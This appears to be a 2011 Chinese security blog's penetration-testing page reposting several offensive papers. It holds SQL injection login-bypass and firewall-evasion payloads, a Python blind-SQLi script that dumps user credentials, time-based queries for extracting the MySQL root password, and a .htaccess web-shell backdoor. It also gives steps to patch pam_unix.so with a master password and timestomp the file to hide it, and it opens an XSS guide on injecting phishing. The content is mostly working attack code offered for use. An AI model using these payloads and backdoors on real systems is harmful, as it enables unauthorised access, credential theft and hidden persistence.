0x50sec.org » 渗透测试

False SQL Injection and Advanced Blind SQL Injection

admin — Thu, 22 Dec 2011 12:51:08 +0000

http://www.exploit-db.com/papers/18263/

False SQL Injection and Advanced Blind SQL Injection

#########################################################################
#                                    #
# Exploit Title: False SQL injection and advanced blind SQL injection    #
# Date: 21/12/2011                            #
# Author: wh1ant                            #
# Company: trinitysoft                            #
# Group: secuholic                            #
#                                    #
#       ###                                       ##           #
#    ######                                    ######         #
#    ##    ##                                  ###   ##        #
#           ##                                ##               #
#            ###                            ###                #
#             ###                          ###                 #
#              ###   #                #   ###                  #
#                ############   ###########                    #
#               ############################                   #
#              ##############################                  #
#              #############################                   #
#             # ############################ #                 #
#              # ####   ############   #### #                  #
#               # ##### ########## ##### #                   #
#                # ###################### ##                   #
#                ## #################### ##                    #
#                 ## ################## ##                     #
#                # ## ################ ## #                    #
#                 # ## ############## ## #                     #
#                 ## ## ############ ## ##                     #
#              ## ## ########## ## ##                      #
#                    # ## ######## ## #                        #
#                       ## ###### ##                           #
#                        ## #### ##                            #
#                         ## ## ##                             #
#                        ##      ##                            #
#                        ##      ##                            #
#                         ### ###                   #
#                                    #
#########################################################################

This document is written for publicizing of new SQL injection method about detour some web firewall or some security solution. I did test on a web firewall made in Korean, most SQL injection attack was hit, I will not reveal the maker for cutting its damage.

In order to read this document, you have to understand basic MySQL principles. I classified the term “SQL Injection” as 2 meanings. The first is a general SQL Injection, we usually call this “True SQL Injection”, and the second is a “False SQL Injection”. Though in this documentation, you can know something special about “True SQL Injection”

And I mean to say it’s true that my method (False SQL Injection) is different from True/False SQL Injection mentioned in “Blind SQL Injection”. A tested environment was as follow.

ubuntu server    11.04
mysql        5.1.54-1
Apache        2.2.17
PHP        5.3.5-1

A tested code was as follow.

/*
create database injection_db;
use injection_db;
create table users(num int not null, id varchar(30) not null, password varchar(30) not null, primary key(num));

insert into users values(1, ‘admin’, ‘ad1234′);
insert into users values(2, ‘wh1ant’, ‘wh1234′);
insert into users values(3, ‘secuholic’, ‘se1234′);

*** login.php ***
*/

if(empty($_GET['id']) || empty($_GET['password'])){
echo “”;
echo “”;
echo “
”;
echo “
ID
”;
echo “PASS
”;
echo “”;
echo “
”;
echo “”;
echo “”;
}

else{
$id = $_GET['id'];
$password = $_GET['password'];

$dbhost = ‘localhost’;
$dbuser = ‘root’;
$dbpass = ‘pass’;
$database = ‘injection_db’;

$db = mysql_connect($dbhost, $dbuser, $dbpass);
mysql_select_db($database,$db);
$sql = mysql_query(“select * from users where id=’$id’ and password=’$password’”) or die (mysql_error());

$row = mysql_fetch_array($sql);

if($row[id] && $row[password]){
echo “
”.”Login sucess”.”

”;
echo “
”.”Hello, “.””;
echo “”.$row[id].”

”;
}
else{
echo “”;
}
mysql_close($db);
}

?>

First, basic SQL Injection is as follow.
‘ or 1=1#

The code above is general SQL Injection Code, and this writer classified the code as “True SQL Injection”. When you log on to some site, in internal of web program, your id and password are identified by some statement used “select id, password from table where id=” and password=”, you can easily understand when you think 0 about character single quotation mark. Empty space is same as 0, the attack is possible using = and 0. As a result, following statement enables log on process.

‘=0#

We can apply it in a different way.

This is possible as 0>-1
‘>-1#

Also, this is possible as 0<1
‘<1#

You don’t have to use only single figures. You can use two figures attack as follow.
1′<99#

Comparison operation 0=1 will be 0, the following operation result is true because of id=”=0(0=1).

‘=0=1#

Additionally there is some possible comparison operation making the same value each other.

‘<=>0#

Like this, if you use the comparison operation, you can attack as additional manner.

‘=0=1=1=1=1=1#
‘=1<>1#
‘<>1#
1′<>99999#
‘!=2!=3!=4#

In this time, you get the turn on understanding False SQL injection. the following is not attack but operation for MySQL.

mysql> select * from users;
+—–+———–+———-+
| num | id        | password |
+—–+———–+———-+
|   1 | admin     | ad1234   |
|   2 | wh1ant    | wh1234   |
|   3 | secuholic | se1234   |
+—–+———–+———-+
3 rows in set (0.01 sec)

This shows the contents in any table without any problem.
The following is the content when you don’t input any value in the id

mysql> select * from users where id=”;
Empty set (0.00 sec)

Of course there is not result because id field dosen’t have any string.
In the truth, I have seen the case that in the MySQL if string field has a 0, the result is true. Based on the truth, following statement is true.

mysql> select * from users where id=0;
+—–+———–+———-+
| num | id        | password |
+—–+———–+———-+
|   1 | admin     | ad1234   |
|   2 | wh1ant    | wh1234   |
|   3 | secuholic | se1234   |
+—–+———–+———-+
3 rows in set (0.00 sec)

If you input 0 in id, All the content is showed. This is the basic about “False SQL Injection”. After all, result of 0 makes log on process success. For making the result 0, you need something processing integer, in that time you can use bitwise operations and arithmetic operations.

Once I’ll show bitwise operation example.

Or bitwise operation is well known for any programmer. And as I told you before, ” is 0, if you operate “0 bitwise OR 0″, the result is 0. So the following operation succeed log on as the False SQL Injection.
‘|0#

Naturally, you can use AND operation.
‘&0#

This is the attack using XOR
‘^0#

Also using shift operation is enable.
‘<<0#
‘>>0#

If you apply like those bitwise operations, you can use variable attack methods.
‘&”#
‘%11&1#
‘&1&1#
‘|0&1#
‘<<0|0#
‘<<0>>0#

In this time, I will show “False SQL Injection” using arithmetic operations.
If the result is 0 using arithmetic operation with ”, attack will be success. The following is the example using arithmetic operation.

‘*9#
Multiplication

‘/9#
Division.

‘%9#
Mod

‘+0#
Addition

‘-0#
Subtraction

Significant point is that the result has to be under one. Also you can attack as follow.
‘+2+5-7#
‘+0+0-0#
‘-0-0-0-0-0#
‘*9*8*7*6*5#
‘/2/3/4#
‘%12%34%56%78#
‘/**/+/**/0#
‘—–0#
‘+++0+++++0*0#

Next attack is it using fucntion. In this document, I can’t show all the functions. Because this attack is not difficult, you can use the “True, False SQL Injection” attack with function as much as you want. And whether this attack is “True SQL Injection” or “False SQL Injection” is decided on the last operation after return of function.
‘ ‘=left(0×30,1)#
‘=right(0,1)#
‘!=curdate()#
‘-reverse(0)#
‘=ltrim(0)#
‘ ‘*round(1,1)#
‘&left(0,0)#
‘*round(0,1)*round(0,1)#

Also, you can use attack using space in function name. But you are able to use the space with only some function.
‘=upper     (0)#

In this time, SQL keyword is method. This method is also decided as True or False Injection according to case.
‘ <1 and 1#
‘xor 1#
‘div 1#
‘is not null#
admin’ order by’
admin’ group by’
‘like 0#
‘between 1 and 1#
‘regexp 1#

Inputting id or password in the field without annotaion is possible about True, False SQL Injection. Normal Web Firewalls filter #, –, /**/, so the method is more effective in the Web Firewalls.
ID : ‘=’
PASS: ‘=’

ID : ‘<>’1
PASS: ‘<>’1

ID : ‘>1=’
PASS: ‘>1=’

ID : 0′=’0
PASS: 0′=’0

ID : ‘<1 and 1>’
PASS: ‘<1 and 1>’

ID : ‘<>ifnull(1,2)=’1
PASS: ‘<>ifnull(1,2)=’1

ID : ‘=round(0,1)=’1
PASS: ‘=round(0,1)=’1

ID : ‘*0*’
PASS: ‘*0*’

ID : ‘+’
PASS: ‘+’

ID : ‘-’
PASS: ‘-’

ID :’+1-1-’
PASS:’+1-1-’

All attacks used in the documentation will be more effective with using bracket when detouring web firewall.
‘+(0-0)#
‘=0<>((reverse(1))-(reverse(1)))#
‘<(8*7)*(6*5)*(4*3)#
‘&(1+1)-2#
‘>(0-100)#

Let’s see normal SQL Injection attack.
‘ or 1=1#

If this is translated in hexdemical, the result is as follow.

http://127.0.0.1/login.php?id=%27%20%6f%72%20%31%3d%31%23&password=1234

Like attack above is basically filtered. So that’s not good attack, I will try detour filtering using tab(%09) standing in for space(%20). In truth, you can use %a0 on behalf of %09.

The possible values are as follow.
%09
%0a
%0b
%0c
%0d
%a0
%23%0a
%23%48%65%6c%6c%6f%20%77%6f%6c%72%64%0a

The following is the example using %a0 instead of %20.

http://127.0.0.1/login.php?id=%27%a0%6f%72%a0%31%3d%31%23&password=1234

In this time, I will show “Blind SQL injection” attack, this attack can’t detour web firewall filtering, but some attacker tend to think that Blind SQL Injection attack is impossible to log on page. So I decided showing this subject.

The following attack code can be used on log on page. And the page will show id and password.
‘union select 1,group_concat(password),3 from users#

This attack code brings /etc/password information.
‘union select 1,load_file(0x2f6574632f706173737764),3 from users#

Dare I say it without union select statement using Blind SQL injection with and operation is possible.

The result of record are three.
admin’ and (select count(*) from users)=3#

Let’s attack detouring web firewall using Blind SQL Injection. The following is vulnerable code to Blind SQL Injection.

/*** info.php ***/

$n = $_GET['num'];
if(empty($n)){
$n = 1;
}

$dbhost = ‘localhost’;
$dbuser = ‘root’;
$dbpass = ‘root’;
$database = ‘injection_db’;

$db = mysql_connect($host, $dbuser, $dbpass);
mysql_select_db($database,$db);
$sql = mysql_query(“select * from `users` where num=”.$n) or die (mysql_error());
$info = @mysql_fetch_row($sql);
echo “”;
echo “
wh1ant”;
echo “ site for blind SQL injection test

”;
echo “
num: ”.$info[0].”
”;
echo “
user: ”.$info[1].””;
echo “”;
mysql_close($db);

?>

Basic Blind SQL Injection is as follow on like above.

http://127.0.0.1/info.php?num=1 and 1=0
http://127.0.0.1/info.php?num=1 and 1=1

But using = operation is possible for Blind SQL Injection.

http://192.168.137.129/info.php?num=1=0

http://192.168.137.129/info.php?num=1=1

Also other operation is possible naturally.

http://127.0.0.1/info.php?num=1<>0

http://127.0.0.1/info.php?num=1<>1

http://127.0.0.1/info.php?num=1<0

http://127.0.0.1/info.php?num=1<1

http://127.0.0.1/info.php?num=1*0*0*1

http://127.0.0.1/info.php?num=1*0*0*0

http://127.0.0.1/info.php?num=1%1%1%0

http://127.0.0.1/info.php?num=1%1%1%1

http://127.0.0.1/info.php?num=1 div 0
http://127.0.0.1/info.php?num=1 div 1

http://127.0.0.1/info.php?num=1 regexp 0
http://127.0.0.1/info.php?num=1 regexp 1

http://127.0.0.1/info.php?num=1^0

http://127.0.0.1/info.php?num=1^1

Attack example:
http://127.0.0.1/info.php?num=0^(locate(0×61,(select id from users where num=1),1)=1)
http://127.0.0.1/info.php?num=0^(select position(0×61 in (select id from users where num=1))=1)
http://127.0.0.1/info.php?num=0^(reverse(reverse((select id from users where num=1)))=0x61646d696e)
http://127.0.0.1/info.php?num=0^(lcase((select id from users where num=1))=0x61646d696e)
http://127.0.0.1/info.php?num=0^((select id from users where num=1)=0x61646d696e)
http://127.0.0.1/info.php?num=0^(id regexp 0x61646d696e)

http://127.0.0.1/info.php?num=0^(id=0x61646d696e)

http://127.0.0.1/info.php?num=0^((select octet_length(id) from users where num=1)=5)
http://127.0.0.1/info.php?num=0^((select character_length(id) from users where num=1)=5)

If I will show all attack, I have to take much time, So I stopped in this time. Blind SQL Injection is difficult manually, So using tool will be more effective. I will show a tool made python, this is an example using ^(XOR) bitwise operation. In order to make the most of detouring the web firewall, I replaced space with %0a.

#!/usr/bin/python

### blind.py ###

import urllib
import sys
import os

def put_data(true_url, true_result, field, index, length):
for i in range(1, length+1):
for j in range(32, 127):
attack_url = true_url + “^(%%a0locate%%a0%%a0(0x%x,(%%a0select%%a0%s%%a0%%a0from%%a0%%a0users%%a0where%%a0num=%d),%d)=%d)” % (j,field,index,i,i)
attack_open = urllib.urlopen(attack_url)
attack_result = attack_open.read()
attack_open.close()

if attack_result==true_result:
ch = “%c” % j
sys.stdout.write(ch)
break
print “\t\t”,

def get_length(false_url, false_result, field, index):
i=0
while 1:
data_length_url = false_url + “^(%%a0(select%%a0octet_length%%a0%%a0(%s)%%a0from%%a0users%%a0where%%a0num%%a0=%%a0%d)%%a0=%%a0%d)” % (field,index,i)
data_length_open = urllib.urlopen(data_length_url)
data_length_result = data_length_open.read()
data_length_open.close()
if data_length_result==false_result:
return i
i+=1

url = “http://127.0.0.1/info.php”

true_url = url + “?num=1″
true_open = urllib.urlopen(true_url)
true_result = true_open.read()
true_open.close()

false_url = url + “?num=0″
false_open = urllib.urlopen(false_url)
false_result = false_open.read()
false_open.close()

print “num\t\tid\t\tpassword”
fields = “num”, “id”, “password”

for i in range(1, 4):
for j in range(0, 3):
length = get_length(false_url, false_result, fields[j], i)
length = put_data(false_url, true_result, fields[j], i, length)
print “”

To its regret, the attack test is stopped for no time, if anyone not this writer studies some attack codes additionally, it will be easy for him to develop the attack.

# Korean document: http://wh1ant.kr/archives/[Hangul]%20False%20SQL%20injection%20and%20Advanced%20blind%20SQL%20injection.txt

[EOF]

LFI WITH PHPINFO() ASSISTANCE

admin — Wed, 14 Sep 2011 02:37:51 +0000

LFI WITH PHPINFO() ASSISTANCE
LFI WITH PHPINFO() ASSISTANCE.pdf

Blind Sql Injection with Regular Expressions Attack

admin — Wed, 22 Jun 2011 03:33:31 +0000

Powered by IHTeam
Site: www.ihteam.net
PHP example code
This paper
Authors:
Simone ‘R00T_ATI’ Quatrini
Marco ‘white_sheep’ Rondini

Blind Sql Injection – Regular Expressions Attack
Blind Sql Injection with Regular
Expressions Attack
Powered by IHTeam
Site: www.ihteam.net
PHP example code
This paper
Authors:
Simone ‘R00T_ATI’ Quatrini
Marco ‘white_sheep’ Rondini
1/9
Blind Sql Injection – Regular Expressions Attack
Index
Why blind sql injection?……………………………………………………………………………………………………….3
How blind sql injection can be used?………………………………………………………………………………………3
Testing vulnerability (MySQL – MSSQL):…………………………………………………………………………….3
Time attack (MySQL)……………………………………………………………………………………………………………3
Time attack (MSSQL)…………………………………………………………………………………………………………..4
Regexp attack’s methodology………………………………………………………………………………………………….5
Finding table name with Regexp attack (MySQL)…………………………………………………………………5
Finding table name with Regexp attack (MSSQL)…………………………………………………………………6
Exporting a value with Regexp attack (MySQL)…………………………………………………………………..7
Exporting a value with Regexp attack (MSSQL)…………………………………………………………………..7
Time considerations……………………………………………………………………………………………………………..8
Bypassing filters………………………………………………………………………………………………………………….9
Real life example…………………………………………………………………………………………………………………9
Conclusions………………………………………………………………………………………………………………………..9
2/9
Blind Sql Injection – Regular Expressions Attack
Why blind sql injection?
Blind SQL Injection is used when a web application is vulnerable to an SQL injection, but the
results of the injection are not visible to the attacker.
The page with the vulnerability may not be one that displays data but will display differently
depending on the results of a logical statement injected into the legitimate SQL statement
called for that page.
This type of attack can become time-intensive because a new statement must be crafted for
each bit recovered. [Wikipedia]
How blind sql injection can be used?
There are several uses for the Blind Sql Injection:
• Testing the vulnerability;
• Finding the table name;
• Exporting a value;
Every techniques are based on the ‘guess attack’, because we only have two different input:
TRUE or FALSE. Let me explain better…
Testing vulnerability (MySQL – MSSQL):
Let’s star with an easy example. We have this type of URL:
site.com/news.php?id=2
it will result in this type of query on the database:
SELECT * FROM news WHERE ID = 2
Now, we can try some sql injection techniques, for example the blind sql injection!
site.com/news.php?id=2 and 1=0
SQL query is now:
SELECT * FROM news WHERE ID = 2 and 1=0
In this case the query will not return anything (FALSE) because 1 is different from 0; Let’s do
the litmus test: try to get the TRUE statement forcing the AND to be TRUE;
site.com/news.php?id=2 and 0=0
In this case 0 is equal to 0… Got it! We should now see the original news page. We now know
that is vulnerable to Blind Sql Injection.
Time attack (MySQL)
When you can’t see any kind of results, you must use the time attack.
In this example we will try to obtain the password of root user in mysql (if your have root
priviledges on mysql).
BENCHMARK function is used to sleep for some seconds.
3/9
Blind Sql Injection – Regular Expressions Attack
Syntax: BENCHMARK(how many times,thing to do).
When you use it in IF statement, you will be able to make time attack in MySQL;
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)=’a',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = ‘root’;
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)=’b',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = ‘root’;
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)=’c',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = ‘root’;
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)=’d',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = ‘root’;
And so on until you will see the BENCHMARK running (few more seconds delay). Now proceed
with the 2nd word of the password…
Time attack (MSSQL)
In this example we will try to obtain the username of the sysusers table.
A simple way to generate time delays is to take advantage of one of the biggest database
problems, that have made necessary the development of performance-tuning techniques;
heavy queries. All you need to generate a time delay is to access a table that has some
registers and to build a good query to force the engine to work. In other words, we need to
build a query ignoring what the performance best practices recommend. (This technique was
made by Chema Alonso, Microsoft Security MVP)
site.com/news.aspx?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as
sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6,
sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1
ascii(substring(name,1,1)) from sysusers)
Positive result. The condition is true, and the response has a delay of 14 seconds. We actually
know that the ASCII value of the first username’s letter in the sysusers table is lower than
300.
site.com/news.aspx?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as
sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6,
sysusers AS sys7, sysusers AS sys8)>1 and 0 >(select top 1 ascii(substring(name,1,1))
from sysusers)
Negative Result. One-second response delay. We actually know than the ASCII value of the
first username’s letter in the sysusers table is higher than 0.
And so on for all the possibilities:
[...] >1 and 300 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 14
seconds → TRUE
[...] >1 and 0 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second →
FALSE
[...] >1 and 150 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 14
seconds → TRUE
[...] >1 and 75 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second →
4/9
Blind Sql Injection – Regular Expressions Attack
FALSE
[...] >1 and 100 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second
→ FALSE
[...] >1 and 110 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second
→ FALSE
[...] >1 and 120 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 14
seconds → TRUE
[...] >1 and 115 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second
→ FALSE
[...] >1 and 118 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second
→ FALSE
[...] >1 and 119 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second
→ FALSE
Then the result is ASCII(119)=’w’.
Start with the second letter… and so on!
Regexp attack’s methodology
This is our own creation and it is the faster to extract information from a database. With this
you can save a lot of time and bandwidth!
The methodology is pretty simple: we define a range of numbers/chars/spacial chars that will
be matched with REGEXP (MySQL) or LIKE (MSSQL) functions.
Let’s start with an example because is more simple to understand.
Finding table name with Regexp attack (MySQL)
In this example we will extract the first matched record of information_schema.tables, you
must know the name of database!
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables LIMIT 0,1)
We tested the blind sql injection attack, and if we see the correct page, everything is ok.
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA=”blind_sqli” AND table_name REGEXP ‘^[a-z]‘ LIMIT 0,1)
In this case we know that the first matched record start with a char between [a -> z]
That example will show you how to extract the complete name of the record:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA=”blind_sqli” AND table_name REGEXP ‘^[a-n]‘ LIMIT 0,1)
True
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA=”blind_sqli” AND table_name REGEXP ‘^[a-g]‘ LIMIT 0,1)
False
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA=”blind_sqli” AND table_name REGEXP ‘^[h-n]‘ LIMIT 0,1)
True
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA=”blind_sqli” AND table_name REGEXP ‘^[h-l]‘ LIMIT 0,1)
False
5/9
Blind Sql Injection – Regular Expressions Attack
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA=”blind_sqli” AND table_name REGEXP ‘^m’ LIMIT 0,1)
False
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA=”blind_sqli” AND table_name REGEXP ‘^n’ LIMIT 0,1)
True
The first letter of the table is ‘n’. But are there other tables start with ‘n’? Let’s change the
limit to 1,1:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA=”blind_sqli” AND table_name REGEXP ‘^n’ LIMIT 1,1)
False
No, there are no more tables that start with ‘n’. From now on we must change the regular
expression like this: ‘^n[a-z]‘ -> ‘^ne[a-z]‘ -> ‘^new[a-z]‘ -> ‘^news[a-z]‘ -> FALSE
To test if we found the correct table name, we must test something like this: ‘^news$’.
Finding table name with Regexp attack (MSSQL)
For MSSQL, the syntax is a little bit more complicated. There are two limitations: LIMIT and
REGEXP are not present. To bypass it, we must use TOP and LIKE functions. See that example:
default.asp?id=1 AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE
TABLE_SCHEMA=”blind_sqli” and table_name LIKE ‘[a-z]%’ )
True
SELECT TOP is used to extract the first x record from information_schema table.
In MSSQL, LIKE function is similar to REGEXP function in MySQL, but the syntax is not equal.
For learn more about LIKE functions consult http://msdn.microsoft.com/enus/
library/ms179859.aspx .
When you need to grab the second table_name, you must use “table_name NOT IN ( SELECT
TOP x table_name FROM information_schema.tables)” like in the example below:
default.asp?id=1 AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE
TABLE_SCHEMA=”blind_sqli” and table_name NOT IN ( SELECT TOP 1 table_name
FROM information_schema.tables) and table_name LIKE ‘[a-z]%’ )
The second SELECT TOP is used to exclude X row and extract the X+1.
Like in the MySQL example, we show how to modify LIKE expression, to extract the first row:
‘n[a-z]%’ -> ‘ne[a-z]%’ -> ‘new[a-z]%’ -> ‘news[a-z]%’ -> TRUE
Otherwise MySQL ending, we have TRUE because ‘%’ define any string of zero or more
characters.
To check the end, we must append “_” and verify if exist another character.
‘news%’ TRUE -> ‘news_’ FALSE
6/9
Blind Sql Injection – Regular Expressions Attack
Exporting a value with Regexp attack (MySQL)
In this example we will extract a MD5 hash from a know table name (in this case ‘users’);
Remember: MD5 can ONLY contain [a-f0-9] values.
We will use the same methodology described in the “Finding table name”.
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP ‘^[a-f]‘ AND
ID=1)
False
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP ‘^[0-9]‘ AND
ID=1)
True
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP ‘^[0-4]‘ AND
ID=1)
False
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP ‘^[5-9]‘ AND
ID=1)
True
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP ‘^[5-7]‘ AND
ID=1)
True
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP ‘^5′ AND
ID=1)
True
Our hash start with ’5′ in just 6 try!
Exporting a value with Regexp attack (MSSQL)
Same thing as MySQL and “Finding Table name”. We now continue the search of second char.
An example below:
default.asp?id=1 AND 1=(SELECT 1 FROM users WHERE password LIKE ’5[a-f]%’ AND
ID=1)
True
default.asp?id=1 AND 1=(SELECT 1 FROM users WHERE password LIKE ’5[a-c]%’ AND
ID=1)
False
default.asp?id=1 AND 1=(SELECT 1 FROM users WHERE password LIKE ’5[d-f]%’ AND
ID=1)
True
default.asp?id=1 AND 1=(SELECT 1 FROM users WHERE password LIKE ’5[d-e]%’ AND
ID=1)
False
default.asp?id=1 AND 1=(SELECT 1 FROM users WHERE password LIKE ’5f%’ AND
ID=1)
True
We have found our second char is ‘f’ in just 5 try! (This is also the worst case for brute-force)
7/9
Blind Sql Injection – Regular Expressions Attack
Time considerations
Take for example the MD5 case. We must export an hash of 32 chars using a blind sql
injection.
You know that there are only 16 chars to be tested (1234567890abcdef);
In an optimistic case, regexp and normal blind need 32 query to be done;
In a worst-case , regexp need 128 query and normal blind need 512 query;
Let’s take now a password case. We must export a 15 chars password mixalpha-numericspecial14.
You know that there are 76 chars to be tested
(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-
_+=);
In an optimistic case, regexp and normal blind need 15 query to be done;
In a worst-case, regexp need approx 94 query and normal blind need 1140 query;
8/9
Regex Normal
0
100
200
300
400
500
600
Max Try
Min Try
Regex Normal
0
200
400
600
800
1000
1200
1400
Max Try
Min try
Blind Sql Injection – Regular Expressions Attack
Bypassing filters
Below are examples of common filters bypass.
TRIM (NO SPACES ALLOWED):
SELECT/*not important*/1/*really…*/FROM/*im serious*/users → (open and
close a comment);
SELECT(1)FROM(information_schema.tables) → (parentheses’s rules)
Special chars like:
%0c = form feed, new page
%09 = horizontal tab
%0d = carriage return
%0a = line feed, new line
Example:
SELECT%09TABLE_NAME%09FROM%0dinformation_schema.tables
SPECIAL CHAR (NO ‘, “ ALLOWED):
Usually the ‘ AND “ are used to input some kind of string. So you can input the HEX
value:
SELECT passwd FROM users WHERE username=0x61646d696e
Where 0x61646d696e is the hex value of ‘admin’
Or also using the CHAR function:
SELECT passwd FROM users WHERE
username=CONCAT(CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110))
Real life example
You can download an example of PHP code from

http://www.ihteam.net/papers/regexp_bsqli.php.tar.gz

Conclusions
To conclude our paper, we must specify that:
1. Is possible make a “combo” attack using “Time Attack” or other;
2. The regexp that you will use, could also be a list of chars like “[abcdef0123456789]”;
3. Our English is fu**ing bad! :)
9/9

用.htaccess做更隐蔽的后门

admin — Fri, 20 May 2011 03:04:34 +0000

作者:kindle

From:http://key0.cn/?p=285

万恶的引用功能，下文复制粘贴无用，请自行将双引号修改

.htaccess内容如下

#首先允许web访问这个文件

Order allow,deny
Allow from all

RedirectMatch 403 .htaccess$
#.htaccess结尾的403错误，这里是为了增加隐蔽性

AddType application/x-httpd-php .htaccess
#给.htaccess映射php拓展

### SHELL ### &1″); ?>### KINDLE ###
#恶意的php代码

使用方法:http://localhost/.htaccess/?c=dir

Backdoor on Pam module pam_unix.so

admin — Tue, 10 May 2011 13:10:19 +0000

来源：http://hi.baidu.com/p3rlish/blog/item/51c6b22e01c64a5d4ec22640.html

这个东西,08年的时候某牛给我讲解过一次,不过没这么通俗易懂,今天看到之后发现这个写的还是不错的,分享一下

In this article I will show you how to modify the PAM module pam_unix.so to let us log on a system (Via SSH per example) using a master password, which can be used with every login on the box.

1. Download PAM Source

ftp://ftp.kernel.org/pub/linux/libs/pam/library/Linux-PAM-1.1.1.tar.gz

2. Unzip and edit the source file we are interested (pam_unix_auth.c)

tar -xvzf Linux-PAM-1.1.1.tar.gz
pico Linux-PAM-1.1.1/modules/pam_unix/pam_unix_auth.c

3. Search in the file the next string

/* verify the password of this user */
retval = _unix_verify_password(pamh, name, p, ctrl);

4. Just after these lines add the next piece of code

if (strcmp(p,”secpass”)==0 ){retval = PAM_SUCCESS;}

Where secpass is the second password (our secret password). With this modification every login with a valid user on the system will accept this password ( root inclusive).

5. Go to the main source directory to configure and compile

./configure
make

This create our needed module in modules/pam_unix/.libs/pam_unix.so

6.Now we need to replace the old module with the new one. But before we will create a backup in case we need it later.

cp /lib/security/pam_unix.so /lib/security/pam_unix.so.orig
cp modules/pam_unix/.libs/pam_unix.so /lib/security/pam_unix.so

7. Test if it works. You can create a new SSH session to the system.

8. Something important to take into consideration is change the file’s modification date.We can do it with touch.

touch -t 200901022110 pam_unix.so

Following these steps you could have an alternative way to enter a system.

That’s why its so important to use a integrity checker on the system (like Tripwire).

Guidebook On Cross Site Scripting

admin — Mon, 09 May 2011 13:05:56 +0000

From:http://packetstormsecurity.org/files/view/99770/ixss.txt

// Best Viewed in Notepad++ with word wrap enabled :)

A Tribute To My Mother Land

” INDIA ”
**********************************************************
We should be thankful and remember the bravery of Maharaja
Prithvi Raj Chauhan, Maharana Pratap, Chandra Shekhar Azad,
Bhagat Singh, Rajguru, Sukhdev and all those who vanished
their lives for the sake of freedom and sanctity of the
land named Hindustan (collectively India, Pakistan &
Bangladesh).

We might remember the intrepid spirit who stood an army
named “Azad Hind Fauj” from prisoners of world war II far
from India and fought for our freedom, The Great Subhash
Chandra Bose. Remember His Words of inspiration

“Tum mujhe khoon do, main tumhe azaadi doonga”

We might get inspired by their great lifestyles and follow
their thoughts.
**********************************************************

Important!… Warning!!!
The author do not take responsibility, if anyone, tries
these hacks against any organization or whatever that makes
him to trespass the security measures and brings him under
the legal prosecution. These hacks are intended for the
improvement of security and for investigations by legal
security agencies. For educational institutions it is
hereby requested that they should prevent their students
from using the tools provided in this paper against the
corporate world. This paper is the proof-of-concept and
must be treated as it is.

<|-[___________________________________________________________________________]-|>
-                                                                                     -
-                              [ Cross Site scripting ]                              -
-                             By Ankit Anand [CrazyAnkit ]                            -
-                                                                             -
<|-[___________________________________________________ ________________________]-|>

# Written On 26 March 2011
# Author : Ankit Anand
[ koolankit1993@gmail.com , ankitthehacker.wordpress.com
# Written For Indishell.in ; Hackerz5.com ; r00tp0is0n.in
# Greetz Fly Out to : RJ D Indian ,cyb3r_shubham , cyb3rs4m ,l0c4l r00t , LuCky , c00lt04d, reb0rn, 3thic4l n00b , darkw0lf , ne0

// Reference : Exploit-db , Aoh [Orkut] , Google ;)

–==+================================================================================+==–
–==+ Dedicated To My Loving parents +==–
–==+================================================================================+==–

=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====x
Feel Free To Share This White paper , knowledge is for sharing , But Respect Author’s Hardwork . Give Proper Credits !

=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====x

<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
|–( I ]> Introduction
0×01: Introduction
0×02: Finding The xss Vulnerable Websites
0×03: Executing Xss Commands
0×04: Bypass techniques
0×05: Damages By Xss
\_ 1.) Inject a Phishing script
\_ 2.) Iframe Phishing
\_ 3.) Redirict Phishing
